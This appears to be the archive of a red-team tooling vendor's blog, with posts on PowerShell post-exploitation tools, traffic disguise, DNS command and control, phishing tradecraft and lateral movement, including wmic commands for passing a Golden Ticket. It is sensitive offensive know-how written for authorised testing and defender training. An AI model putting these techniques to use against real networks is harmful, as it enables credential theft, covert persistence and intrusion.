Archive for the ‘Red Team’ Category

h1

My Favorite PowerShell Post-Exploitation Tools

February 25, 2015

PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I’d like to take you through a few of my favorite collections of PowerShell scripts.

beaconpowershell

PowerSploit

Let’s start with PowerSploit. This is a post-exploitation toolkit originally put together by Matt Graeber with contributions from Chris Campbell, Joe Bialek, and others. When I use Beacon, this toolset is almost a drop-in replacement for features that I would normally need Meterpreter to get to.

For example, if I want to use mimikatz to dump plaintext credentials, I simply import the Exfiltration/Invoke-Mimikatz.ps1 script and call the Invoke-Mimikatz cmdlet. Simple.

PowerSploit also features several great tools to steal credentials in other ways, log keystrokes, and take screenshots.

PowerUp

Every Christmas, I ask Santa for a privilege escalation vulnerability scanner. This has long made sense to me. When I have access to a system, I am in a good position to conduct automated reconnaissance and identify a known weakness to elevate with. Will Schroeder answered my wish with the PowerUp tool. This PowerShell script interrogates the system in several ways to find a privilege escalation opportunity. It even offers some helpful cmdlets to help you take advantage of the misconfigurations and weaknesses it finds. To use PowerUp I just import PowerUp.ps1 into Beacon and run the Invoke-AllChecks cmdlet.

PowerView

Last in my list is PowerView (also by Will Schroeder). This script is a full toolkit to interrogate a domain for hosts, users, and complex trust relationships. I probably use less than 10% of its potential capability right now. I tend to use PowerView to list hosts on a network and to quickly find out where I may have admin rights with my current token. This has become one of my first network reconnaissance tools and it has eliminated a need to scan for targets in many cases. My favorite PowerView cmdlets are Invoke-Netview and Invoke-FindLocalAdminAccess.

h1

Another Night, Another Actor

February 19, 2015

Earlier last year, I had a frantic call from a customer. They needed to make a small change to Beacon’s communication pattern and quickly. This customer was asked to spend a week with a network defense team and train them on different attacker tactics. Each day, my customer had to show the network defense team all of their indicators and walk them through each of their activities. After a few days, this network defense team was able to zero in on Cobalt Strike’s Beacon and they were having trouble conducting other types of training activity because of this.

A blue training audience gets the most benefit from a red team’s activity when the red team shares their indicators, tactics, and knowledge with them. Clear indicator information allows the blue team to look at their sensors and see what they missed when they tried to put the story together. An open discussion of favored tactics (e.g., ways to do lateral movement, techniques like the Golden Ticket, etc.) allows a blue team to address major gaps in their defenses.

For red teams, openness comes at a cost. Tools and capabilities are expensive to buy or time-consuming to build. A red team’s effectiveness comes down to skilled operators and tools that give them freedom to work in a network. You need both. A poor operator will misuse a good tool. Depending on the maturity of the training audience and environment, a skilled operator may find themselves completely unable to operate without good tools to support them.

When a red team gives up all of their operating information, they’ve given their training audiences a gift-wrapped roadmap to detect their activity now and into the future. It’s a lot harder to play the role of an unknown adversary when your tools are well understood by the training audience.

To deal with this problem, most red teams choose to keep information about their tools and tactics close hold. They’re relying on a strategy of obscurity to protect their investment and to extend the productive life of their current technologies. This is at direct odds with what a red team should offer.

I think about this problem a lot. I sell a public solution that allows red teams to operate. I do not have the luxury of obscurity. I also don’t want obscurity. I want the training audiences I work with to get the most benefit possible from the red team activity my customers and I conduct. This means my customers need to feel safe disclosing details about their operations and their use of my tools.

I’ve made some headway on this problem and it’s one of the things in Cobalt Strike I’m most proud of.

On-disk, Cobalt Strike has its Artifact Kit. This is my source code framework to build all of Cobalt Strike’s executables and DLLs. My customers get the source code to this framework and they have the freedom to change this process and introduce other techniques to evade anti-virus. Cobalt Strike also plays nice with the Veil Evasion Framework. It’s trivial to export one of Cobalt Strike’s proprietary stagers in a Veil-friendly format too.

Network indicators are another story. Once a blue team understands what your tool looks like on the wire, it’s generally game over for that capability. Cobalt Strike has a good handle on this problem too. Malleable C2 lets Cobalt Strike’s end-users change Cobalt Strike’s indicators on the wire.

Specifically:

You get to transform and define where in a POST and GET transaction Beacon stores its metadata, output, and tasks. If you want to base64 encode an encrypted task and wrap it in HTML you’re welcome to do that. If you want to stick your encrypted tasks in the middle of an image, this is trivial to do too.

You get to dress up your transaction with extra indicators. You can add whichever client and server headers you want to HTTP POST and GET transactions. You can add arbitrary parameters to your GET and POST requests. You also get to define the URLs used for each of these.

These two pieces combined together give you a lot of control over what Cobalt Strike’s Beacon looks like on the wire. If you want, you can look like known malware. Or, you can blend in with existing traffic. Or, do something in between to adjust your activity to what your training audience is ready for.

Now, what about that customer? Sadly, Malleable C2 didn’t exist at the time of that call. We were able to figure out a one-off work-around for their situation. Today it’s a different story. Between Artifact Kit and Malleable C2, it’s quite feasible to make Cobalt Strike look like a new actor. You can do this on a weekly or even daily basis, if you need to. This flexibility is a big step towards resolving the openness versus future effectiveness conflict.

h1

DNS Communication is a Gimmick

February 4, 2015

I added DNS Communication to Cobalt Strike in June 2013 and refined it further in July 2013. On sales calls and at conferences I get a lot of questions and compliments on this feature. That’s great.

I’ve also heard the opposite. I’ve heard folks say that DNS Command and Control is noisy. It’s “easy to detect”. I’ve had someone go so far as to say that it’s a gimmick.

I have a philosophy: I like options. I have a preferred way to work. I stay aware of how this preferred way may break down. When this happens, I like to know I can still work and get things done. Cobalt Strike’s DNS C2 is a great example of how this philosophy influences my development choices.

I released Beacon in the 27 Sept 2012 release of Cobalt Strike. This first Beacon could beacon over DNS or HTTP. The DNS beacon would periodically make an A record request to a domain that I, the attacker, am authoritative for. My server would provide a response that told the Beacon whether or not it should make an HTTP request to download its tasks. I built this Beacon for stealth. By checking for requests with DNS, I limit how often my compromised systems need to connect directly to me.

dnscomms2

The above is not easy to detect. I’ve had folks tell me that they see this behavior in production. One A record request every 24-hours or week is not trivial to find. This is scary.

In the first half of 2013 I had several opportunities to use Cobalt Strike. I took advantage of the DNS Beacon as a persistent agent. During this time I ran into a scenario I call “the child in the well”. I would see a compromised host beacon, but it would never connect to me to download its tasks. This is a terrible situation. My compromised system can call out to me. I know it’s there. But, I can’t reach it. This happened to me twice and I knew I needed to do something about it.

I added a mode command to the DNS Beacon. This command allows the end-user to state which data channel Beacon should use to download its tasks. When a tasking is available, I communicate this channel preference to the DNS Beacon in my 4-byte A record response.

I added modes to communicate over HTTP, DNS A records, and DNS TXT records. Each of these channels has their purpose and I allow the user to switch back and forth between them for each deployed DNS Beacon.

The HTTP data channel is the default. The compromised system connects to me with a GET request to download its tasks. It uses a POST request to send output when it’s available.

If I run into a child in the well scenario I have a choice between the two DNS data channels.

I used to use Beacon primarily as a lifeline to send sessions to other team servers. The A record channel is in the spirit of this original use case. I can task the Beacon and it will download its tasking 4-bytes at a time. If the system can Beacon to me, then I have some option to control it. The A record data channel isn’t efficient, but it works in a pinch.

I added the TXT record channel at the same time I built a SOCKS proxy server into Beacon. This was July 2012. I built these capabilities into Beacon to keep with an offense in depth philosophy. If I can’t get out of a network on any channel, except DNS, I need a way to continue to work. I saw pivoting as essential to this and so I built the SOCKS proxy server. The TXT record channel is suitable for tunneling some traffic through a Beacon.

I hope this post helps shine light on how I use DNS for covert communication. As a beacon with a high sleep time–it’s stealthy. As a data channel, it’s useful when there are no other options. Which option makes sense will depend on your context. The ability to rationalize context to tool comes from mature tradecraft.

h1

Pass-the-(Golden)-Ticket with WMIC

January 7, 2015

One of my favorite blog posts from last year was the Adversary Tricks and Treats post from CrowdStrike. They showed how one of the actors they track changed their tactics to cope with a more alert defender.

This actor, DEEP PANDA, sometimes injects a Golden Ticket onto their local Kerberos tray. To move laterally, this actor uses this trust to enable the RDP sticky keys backdoor on target systems. The actor then RDPs to the target and uses this backdoor to get a SYSTEM level command shell. Nothing to it.

When I read about interesting tradecraft, I like to reproduce it in a lab. According to CrowdStrike, this actor uses wmic to pass the Golden Ticket and execute their commands on the target systems.

I stood up a test system and used kerberos_ticket_use in Beacon to ingest a Golden Ticket. I then tried to execute a command on a Windows 8 system with WMIC:

wmic /node:WIN8WORKSTATION process call create “stuff I want to run”

This command failed with an access denied. Picture a Sad DEEP PANDA face here. After some digging, I found that there’s a flag I need to specify. To pass a Kerberos ticket with WMIC, use /authority:”kerberos:DOMAIN\TARGET” on your WMIC command line. So in this case:

wmic /authority:”kerberos:CORP\WIN8WORKSTATION” /node:WIN8WORKSTATION process call create “stuff”

That’s how you pass a Golden Ticket with WMIC.

h1

How did your hacking-style change in 2014?

December 30, 2014

The end of the year is always a good time for reflection. As you close out your year, I encourage you to ask: how did your style of hacking change and evolve in 2014? I suspect most of us have some answer to this question. We’re always learning and becoming informed by new tricks.

Here’s how my personal hacking-style has changed in 2014.

PowerShell for Post Exploitation

There’s a lot of enthusiasm for PowerShell in the offensive community. I feel that these enthusiasts are split into two camps though. One camp advocates PowerShell as a tool to bootstrap a payload without worrying about anti-virus. Another camp develops all of their post-exploitation tools in PowerShell and operates through these tools.

This year, I came into the second camp. I would always acknowledge that there was great capability in PowerShell. But, the difficulty using these scripts with the tools I know [Meterpreter, Beacon] prevented me from experiencing it first hand.

This year, I took the time to integrate PowerShell into Cobalt Strike’s Beacon payload and remove this hurdle. Immediately, my eyes were opened to a whole universe of post-exploitation tools I didn’t have before.

Veil PowerUp has changed how I elevate my privileges. Now, one of my standard items is to use PowerUp to find misconfigurations on the compromised target before I look at other options.

Veil PowerView has changed how I interrogate a network, enumerate trusts, and look for targets I can jump to laterally.

And, PowerSploit combined with Beacon provides a very respectable post-exploitation toolkit.

Almost all of my post-exploitation is asynchronous now. I go interactive only when I need to tunnel another tool through a Beacon.

Lateral Movement without PsExec

My tools tend to expose the Metasploit Framework’s workflow for lateral movement. Dump hashes and use the psexec module to get a session on a host. Or, steal a token and use current_user_psexec to get to that host. If current_user_psexec fails [it will], know how to run an artifact on a remote system the manual way.

The workflow for lateral movement I use today is much different. Late 2013, I introduced the named pipe communication channel into Beacon. I saw some interesting possibilities for this channel, but during use, I could tell the supporting features were missing. These came in February 2014. I added the ability to generate artifacts that contain the entire Beacon payload and Beacon gained tools to elevate privileges and steal tokens.

The above was enough to move my lateral movement workflow away from Metasploit’s workflows. I now capture a trust through Beacon [net use, steal a token, import a kerb ticket] and use wmic, at, sc, or schtasks to run an artifact I copy to the remote target. This artifact is almost always an SMB Beacon. This is the Beacon variant that waits for me to link to it over a named pipe. This is very stealthy and it’s a very powerful way to use Beacon. Almost all of my lateral movement is asynchronous now.

Persistence without Malware

Another big change to my process came from Mimikatz and the Golden Ticket technique. This technique allows me to use the krbtgt hash taken from a domain controller to generate valid Kerberos tickets for any user I like. These tickets are not tied to the user’s password at all. This technique has changed how I do persistence. Now, I tend to pull the information I need to generate tickets at will and store it in an attacker-accessible Wiki. When I need access to a server or some other key asset, I generate a ticket, import it into Beacon, take the server, and then pull off of it when I’m done.

For defenders used to finding malware and cleaning it up, this is a big mental shift. They can’t just delete a bad binary and assume their network is clean. They have to think about which trusts the attacker had access to and how that might allow the attacker to reclaim control of their network at will. It’s an interesting problem.

I’ve always appreciated living on hosts without malware. In exercises, the sticky keys backdoor is useful. Periodically using Mimikatz to pull credentials to (re)use later is also a way to hold access. These techniques are fine but they carry risk [the RDP backdoor is easy to find, vigilant admins change their passwords]. The Golden Ticket allowed me to have confidence in and rely on malware-free persistence in a way that I just couldn’t before.

In terms of my tradecraft and thinking about how I “hack”, these are the three things that changed for me in 2014. What changed for you?

h1

What’s the go-to phishing technique or exploit?

December 17, 2014

This blog post is inspired by a question sent to a local mailing list. The original poster asks, what’s the go-to phishing technique or exploit in a blackbox situation? Here’s my response:

I’ve had to do this before, I sell tools to do it now, and I’ve seen how others teach and go about this particular process. First, I recommend that you read MetaPhish. No other paper or talk has influenced how I think about this process more:

You’ll notice I said the word process. Before you dig into a toolset, you’ll want to figure out the process you’re going to use. Here’s what I used and it has parallels with the processes I see others use now [regardless of toolset]:

0. Information Gathering

Find out about your target, harvest email addresses, etc. etc. etc.

1. Reconnaissance

This is the phase where you sample the target’s client-side attack surface. I used to send a few fake LinkedIn invitations across an org and direct those folks to a web app that profiles their browser. Similar information to what you see here: http://browserspy.dk/

I’ve seen some organizations use BeEF for this purpose and Black Squirrel does this as well.

2. Stand up a Test Environment

Next, I recommend that you create a virtual machine to mirror their environment as closely as possible. Install patches and other tweaks you think may be present. This isn’t the place to underestimate their posture. I’d also recommend trying out the different A/V products you expect to see at this point. Use the information from the reconnaissance step to make this as exact as possible.

3. Choose your attack

Now, you will need to select an attack to use against your target. I really recommend that you stay away from the memory corruption exploits in the Metasploit Framework. You can tweak them to get around some anti-virus products. But, you really need to pay attention to the exploit’s needs. For example, let’s say the target profile reveals a vulnerable version of IE and Metasploit has an exploit for it. What are the dependencies of that exploit? Does it also require Java 1.6 to help it get past some of Windows’ protections? You could play this game. Or, you could skip it altogether.

Many folks who execute these kinds of engagements regularly use user-driven attacks. A user-driven attack is an attack that relies on functionality and fooling the user into taking some detrimental action. The Java Applet attack is an example of a very popular user-driven attack. I’m surprised it still works today, but *shrug*. Embedding a macro into a Word or Excel spreadsheet is also effective.

The stock vba macro you can get out of MSF is also pretty good [it injects straight into memory]. I understand that BeEF has some options in this area too, but I haven’t played with them.

4. Pair your attack with a payload

Don’t take it for granted that you’ll walk out of your target’s network with a Metasploit Framework payload. I see egress as one of the toughest problems when working with a harder target. If you have to use a Metasploit Framework payload, windows/meterpreter/reverse_https is your best bet here. I recommend that you look for and consider other options though. A lot of organizations who do this kind of work have a custom payload or they buy one. If I were in a hurry to cobble up a process and didn’t have a budget, I’d look at building something in PowerShell. The main things you care about:

a. Is the payload proxy aware? Will it take the same actions that the user’s browser would take to get out to the internet?

b. Can I match the payload’s characteristics to the target environment? For example, making its User-Agent match something legitimate?

bb. If I opt to go SSL, can I use a legitimate certificate? If not, does the payload at least try to look like legitimate traffic if I communicate without SSL?

c. Is the payload asynchronous? You really want something reliable that doesn’t stand out while you figure out what to do next on your target’s network.

d. Can I pair this payload with my attack? This is an important consideration. If you have a great piece of custom malware but *can’t* pair it with your chosen attack, it’s not useful to you for this phase of your engagement.

Your custom payload [bought/built] does not need to be fully functional. Its main goal is to defeat egress restrictions and act as a lifeline while you figure out the best steps to fortify your access [if that’s what your customer wants]. The main thing it needs to be able to do is spawn another payload.

Here’s one of my favorite talks on how to pull something like this together, quickly:

I also recommend that you setup infrastructure for each piece of this attack. You should send phishes from different places. You should host your recon app on its own server. The server your user-driven stages your payload from should differ from the server the payload actually communicates with [if your payload is delivered in stages]. Ideally, your asynchronous lifeline payload should call home to multiple hosts in case one of them becomes blocked.

5. Deliver the package

The final phase is to send the package on to your target. I don’t recommend that you spray every email you found. If your goal is to demonstrate a targeted attack, be targeted.

Personally, I’m a stickler for pixel perfect phishing emails and I’m not a fan of crafting an HTML email in a hacker tool to achieve this. If in doubt, I recommend that you use the same email client that your legend [the person you’re pretending to be] would use to send the email. If your target is someone in HR and your legend is someone applying for a job, use Gmail to send your phish. Preferably, the same Gmail account noted in the resume.doc you embedded a macro inside of.

Before you phish, I recommend that you send your package to yourself, through infrastructure that mirrors your target environment as closely as possible. If your target uses a cloud email service, try to get an account on the free or low-tier paid version of this service and send your package to yourself there. If your target uses a more traditional Exchange+Outlook setup, see if you can build a lab with those pieces or rely on a friend who has access to something similar. The main point here is to make sure your lovingly crafted bundle of good isn’t going to the spam folder. It’d be a shame to go through all of this work to get stopped by that.

Even if you have a favorite “go to” user-driven attack, I recommend executing this process anyways. You don’t want to fire an attack package crafted for a Windows environment only to find that your target is a MacOS X shop.

Tradecraft parts 3, 4, and 8 cover these topics.

h1

Give me any zero-day and I will rule the world

October 30, 2014

A few months ago, I was having lunch at a favorite Italian restaurant in Washington, DC. I work in a residential area, which means lunch time is slow and there’s no crowd. This leads to many conversations with the staff. This particular conversation drifted to Time Magazine’s July World War Zero article about the sale of zero-day exploits.

What a strange world we live in. Zero-days are now common lunch conversation almost along the lines of talking about the weather.

I applaud the work our industry has done to educate the public about the risk of software vulnerabilities. That said, there is a down side. Most people, some who even work in security, only understand hacking as the exploitation of software vulnerabilities. They don’t think about the rest of the intrusion process or envision what steps the attacker takes after the compromise.

I see exploits as a small part of the hacking puzzle. If someone has an unpatched known vulnerability–bad on them and yes, they should address it. But, there are other ways to get a foothold in a network besides memory corruption exploits. Some targeted attacks involve sending documents or files that abuse known functionality. These attacks are low on the sophistication scale, but I know many penetration testers who continue to get footholds with Java Applet attacks. A memory corruption exploit might assist with the foothold, but it’s not a requirement to gain one.

Following the foothold is post-exploitation. A common attacker goal is to escalate privileges and capture a trust relationship that allows them to move within a domain. Here’s another place a memory corruption exploit may help. A memory corruption exploit against the local system may give me a free pass to elevated rights. Again, there are other ways to get this control. If the user is a local administrator, the attacker has full control of the current system. UAC is not a security boundary and in many cases, it’s trivial to bypass. And yes, the bypass can work on Windows 8.1. Let’s say the user isn’t a local administrator. Surely, one must have a memory corruption exploit to work, right? Wrong. Take a look at harmj0y’s PowerUp. This is a PowerShell script to search for opportunities to elevate based on weak permissions or configuration mistakes. A memory corruption exploit might assist with privilege escalation, but it’s not a requirement to escalate privileges.

Let’s discuss lateral movement and domain privilege escalation.

Lateral movement is the process where an attacker abuses trust relationships to gain control of other systems on the same domain. Lateral movement has its challenges. The attacker has to impersonate a user that a target system recognizes as an administrator. This trust information comes in many forms. An attacker might dump the encrypted passwords of local users associated with the system. If the Administrator account password is the same on another system, the attacker may use this password hash to authenticate to that system and carry out privileged actions. This is the pass-the-hash attack and it does not involve memory corruption. Another form of trust is an access token. This is a data structure, managed by Windows, that contains everything needed to allow a seamless single sign-on experience. An attacker can capture one of these tokens and apply it to their current session. Now, the attacker has the rights spelled out in this token and they may use it to interact with another system [if the target sees the user as an administrator]. This process does not require a memory corruption exploit.

Domain Privilege escalation is the process where an attacker takes systems to capture new trusts until they find a trust that gives them full control of the domain or get the data they’re after. If an attacker captures a token for a Domain Administrator user, it’s game over. The attacker has access to all systems joined to that domain. If the attacker captures a token for a domain user with administrator rights to some systems, the attacker may leverage that token to take control of those systems. This process does not require a memory corruption exploit.

It gets worse. With full control of the domain, the attacker can steal the secret that the domain’s security rests on. This is the password hash of the krbtgt user on a domain controller. If the attacker captures this information, the attacker has the freedom to leave your network for weeks, months, or years at a time. The attacker may come back through a phishing attack and apply a self-generated Kerberos ticket to their current session. With this shared secret in hand, the attacker may create a ticket that allows them to gain the rights of any domain user–without knowledge of that user’s password. In effect, this means the attacker may regain domain administrator rights at any time. This is the Golden Ticket Attack in Mimikatz and it does not require a memory corruption exploit.

I think memory corruption is cool, but hacking goes far beyond it. Hacking is understanding a system well enough to make it do things others didn’t intend. When I teach hacking now, I don’t cover memory corruption exploits. Too many people are stunted by this idea that they must scan for vulnerabilities, find one, and exploit it. This is old thinking. We should teach people that a well-built memory corruption exploit is one access or privilege escalation technique of many. By far, it’s not the whole game.

A penetration test that focuses on vulnerabilities and ignores most of the attack process doesn’t help a customer defend their network better. As offensive professionals, it’s on us to know the steps attackers take and to arm ourselves with knowledge and tools to reproduce them. If we can’t persist, move laterally, steal data, and defeat defenses in a credible way, what use are we to help customers understand their security posture? Creative thinking about these problems won’t happen if we focus too much on one (optional) piece of the hacking process.

Follow

Get every new post delivered to your Inbox.

Join 14,729 other followers